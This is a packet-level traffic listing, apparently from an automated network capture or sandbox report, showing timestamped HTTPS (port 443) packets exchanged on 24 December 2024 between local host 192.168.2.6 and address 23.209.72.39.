                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.186132908 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.186146975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.186158895 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.186172009 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.210547924 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.210899115 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.295181036 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.302314043 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.302680969 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303273916 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303332090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303343058 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303435087 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303447008 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303510904 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303520918 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303586006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303601980 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.303615093 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.304119110 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.312784910 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.328418970 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.335732937 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.335895061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.336102962 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.336113930 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.337378025 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.343652964 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.377042055 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.383996964 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384254932 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384552002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384659052 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384674072 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384743929 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384778976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384824991 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.384839058 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.385015965 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.385066986 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.385077953 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.385369062 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395673037 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395697117 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395730019 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395817995 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395829916 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395843029 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395854950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395941973 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.395999908 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.396012068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.396152020 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.415887117 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.469043016 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.476782084 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.476857901 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477032900 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477083921 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477097034 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477098942 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477214098 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477226973 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477238894 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477363110 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477375031 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477456093 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477663040 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482476950 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482933044 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.485544920 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.486835003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.490392923 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.643466949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.658473969 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.667767048 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.667846918 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668095112 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668098927 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668107986 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668123007 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.672930002 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.723952055 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.730458975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737066984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737205982 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737240076 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737329006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737339020 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737365007 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737567902 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.756333113 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.811695099 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824364901 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824378014 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824619055 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824645042 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824657917 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824671030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824682951 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824693918 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824703932 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.825923920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826035023 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826087952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826100111 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826109886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826138973 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826752901 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.828671932 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.829705000 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.829765081 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830008030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830100060 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830112934 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830228090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830239058 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830249071 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.831630945 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.833916903 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.836632967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837430954 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837701082 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837773085 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837785006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837908030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837919950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837933064 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837944984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838049889 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838063002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838076115 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838222027 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.839766026 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850018978 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850101948 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850115061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850203037 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850214005 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.856770039 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.994482994 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.003916025 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.003966093 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004055023 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004071951 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004085064 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004153967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004163980 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004282951 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004352093 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004378080 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004390955 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.004626989 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.006128073 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.014221907 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.014270067 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.014281034 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.014391899 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.018867016 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.070694923 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.078377008 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.078658104 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.078664064 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.078777075 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.078948975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080028057 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080038071 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080069065 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080127001 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080137014 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080147028 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080332994 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.080976963 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.098236084 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.131766081 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.148200989 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154268026 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154277086 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154402971 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154449940 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154460907 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154536009 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154553890 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154582977 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154594898 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154603958 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154762030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154772997 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154782057 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.154927969 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.228903055 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229041100 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229167938 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229242086 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229381084 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229475021 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229572058 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229652882 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.229862928 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.230153084 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.230216026 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231590986 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231741905 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231765032 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231775999 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231786966 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231798887 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231933117 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231945038 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231956005 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231967926 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.231978893 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.232599974 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.238039017 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.240174055 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.256727934 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.256803036 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.256932974 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.256944895 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.256961107 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.257256031 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.260541916 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.268230915 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.268277884 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.268317938 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.268547058 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.268827915 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.268927097 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.272799015 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.338763952 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.411741972 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421080112 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421396017 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421443939 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421590090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421629906 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421641111 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421766996 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421777010 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421786070 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421798944 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421896935 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421914101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.422580957 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.436256886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.436286926 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.439816952 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.677515984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.793931961 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.890938997 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.890974998 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.891045094 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.891172886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.895556927 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.902805090 CET4435410823.209.72.39192.168.2.6
